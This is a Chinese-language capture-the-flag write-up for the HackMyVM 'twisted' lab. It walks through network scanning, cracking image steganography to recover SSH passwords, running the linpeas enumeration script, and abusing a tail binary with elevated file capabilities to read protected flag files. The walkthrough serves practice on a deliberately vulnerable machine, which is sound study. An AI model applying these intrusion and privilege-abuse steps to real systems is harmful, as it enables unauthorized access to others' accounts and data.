记一次hackmyvm综合靶场的渗透测试-twisted

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机:192.168.1.128

靶机:未知

目标:root.txt和user.txt

nmap -sn 192.168.1.0/24

1650163332_625b7e84b4f54be10b94b.png!small?1650163334115

nmap -A -p1-65535 192.168.1.66

1650163338_625b7e8aa9622a4667dde.png!small?1650163340088

开启了80端口和2222端口,而且是ssh22端口修改为2222端口!

访问下80端口!!

漏洞利用阶段

http://192.168.1.66/

我喜欢猫,但是更喜欢这个,因为它不同!

1650163344_625b7e90be9905f577d7d.png!small?1650163346141

查看下源代码!

1650163352_625b7e981a05fb690f24f.png!small?1650163353434

我们查下下面那两张图是否有图片隐写!

exiftool cat-original.jpg

exiftool cat-hidden.jpg

扫描下目录看看!啥也没有!

看了大佬的WP,工具用错了!

stegcracker cat-hidden.jpg 采用默认的字典破解后,生成了一个密码!

1650163363_625b7ea3ea7de7d150fbe.png!small?1650163365481

sexymama

1650163370_625b7eaab472f9d5f8769.png!small?1650163372042

thisismypassword

stegcracker cat-original.jpg 采用默认的字典破解后,生成了一个密码!

1650163397_625b7ec5d55a45d295048.png!small?1650163399254

westlife

1650163403_625b7ecb690a042234bc8.png!small?1650163404802

markuslovesbonita

接下来,需要使用一个工具利用上文的密码破解图片中隐藏的数据!

steghide extract -sf cat-hidden.jpg

密码是:sexymama

1650163413_625b7ed525ec94d9cfb47.png!small?1650163414465

生成文件:mateo.txt

cat mateo.txt

Thisismypassword

steghide extract -sf cat-original.jpg

密码是:westlife

1650163477_625b7f154e7f253796a4d.png!small?1650163478653

生成文件:markus.txt

cat markus.txt

markuslovesbonita

感觉这个mateomarkus就是ssh的用户名!

对应前面提示,更新换下面那个!

所以实际可用的应该是!

用户名:mateo 密码:Thisismypassword 端口:2222

试一下!ssh mateo@192.168.1.66 -p2222

1650163495_625b7f2757f9fb3bb7ffa.png!small?1650163496875

找了下,没有flag!但有这个

1650163500_625b7f2cea779e6474d75.png!small?1650163502276

访问http://192.168.1.66/gogogo.wav直接下载!估计是个joke!

嘟嘟嘟,像是莫斯密码!

解密地址:

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

解密信息:

G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .

一共这几个账户!

1650163514_625b7f3a95d6bfb45716b.png!small?1650163515926

我们在登录下markus账户!发现了这个!这个账户也没有flag!

1650163526_625b7f466f2c7bf9e45a2.png!small?1650163527818

先看下bonita目录,果然我们需要的在这,而且那个beroot应该是提权到root的程序!

1650163533_625b7f4d99355c1817c1f.png!small?1650163535044

我们用这个id_rsa登录bonita账户查看下!

但是经查看,我没有权限读取这个文件!

1650163543_625b7f57770a7a3b5d401.png!small?1650163544792

遇事不决上传脚本走起!

1650163547_625b7f5b822efb75cd83c.png!small?1650163548829

http://192.168.1.128:8000/linpeas.sh

1650163552_625b7f604c5acfa3a53a0.png!small?1650163553620

这里看到了特殊的文件权限:

1650163556_625b7f6492a0bd74ecc4c.png!small?1650163557911
1650163562_625b7f6a2736b532b46ab.png!small?1650163563453

我们这里直接读取flag文件内容:

1650163567_625b7f6f447229a51aacb.png!small?1650163568602

/usr/bin/tail -n 100 /home/bonita/user.txt

HM***********at

1650163584_625b7f804964f8097f359.png!small?1650163585642

/usr/bin/tail -n 100 /root/root.txt

HM************ycat

成功偷鸡!

这个就没有权限提升阶段了!

本文作者:知非, 转载请注明来自FreeBuf.COM

© 版权声明
THE END
喜欢就支持一下吧
点赞11赏点小钱 分享